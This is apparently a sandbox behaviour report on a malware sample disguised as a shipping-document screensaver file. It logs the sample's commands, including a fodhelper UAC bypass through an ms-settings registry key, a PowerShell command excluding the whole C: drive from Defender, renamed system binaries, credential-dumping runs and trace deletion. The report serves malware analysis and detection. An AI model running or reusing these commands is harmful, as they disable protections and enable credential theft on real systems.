Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000025.00000002.1832307600.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000024.00000002.1865964379.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000024.00000002.1865964379.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000024.00000002.1865964379.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000024.00000002.1865964379.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000024.00000003.1864218322.000000000092B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000024.00000002.1865964379.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	ReversingLabs: Detection: 28%
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Virustotal: Detection: 27%

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

File read: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Jump to behavior

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Evasive API call chain: __getmainargs,DecisionNodes,exit

Source: unknown	Process created: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe "C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe"
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process created: C:\Users\Public\Libraries\glrkszlG.pif C:\Users\Public\Libraries\glrkszlG.pif
Source: C:\Users\Public\Libraries\glrkszlG.pif	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\18A2.tmp\18A3.tmp\18A4.bat C:\Users\Public\Libraries\glrkszlG.pif"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
Source: C:\Users\Public\xkn.exe	Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows \System32\per.exe "C:\\Windows \\System32\\per.exe"
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe C:\\Users\\Public\\Libraries\\Glzskrlg.PIF
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
Source: unknown	Process created: C:\Windows\System32\SystemSettingsAdminFlows.exe "C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\\Windows \\System32\\per.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process created: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe /stext "C:\Users\user\AppData\Local\Temp\agyqwjporhwhb"
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process created: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe /stext "C:\Users\user\AppData\Local\Temp\cidbxbaqfqomdosx"
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process created: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe /stext "C:\Users\user\AppData\Local\Temp\mcrtxutjtygzocojvhg"
Source: unknown	Process created: C:\Users\Public\Libraries\Glzskrlg.PIF "C:\Users\Public\Libraries\Glzskrlg.PIF"
Source: unknown	Process created: C:\Users\Public\Libraries\Glzskrlg.PIF "C:\Users\Public\Libraries\Glzskrlg.PIF"
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process created: C:\Users\Public\Libraries\glrkszlG.pif C:\Users\Public\Libraries\glrkszlG.pif	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe C:\\Users\\Public\\Libraries\\Glzskrlg.PIF	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process created: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe /stext "C:\Users\user\AppData\Local\Temp\agyqwjporhwhb"	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process created: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe /stext "C:\Users\user\AppData\Local\Temp\cidbxbaqfqomdosx"	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process created: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe /stext "C:\Users\user\AppData\Local\Temp\mcrtxutjtygzocojvhg"	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\18A2.tmp\18A3.tmp\18A4.bat C:\Users\Public\Libraries\glrkszlG.pif"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows \System32\per.exe "C:\\Windows \\System32\\per.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\\Windows \\System32\\per.exe" / A / F / Q / S	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: archiveint.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: url.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
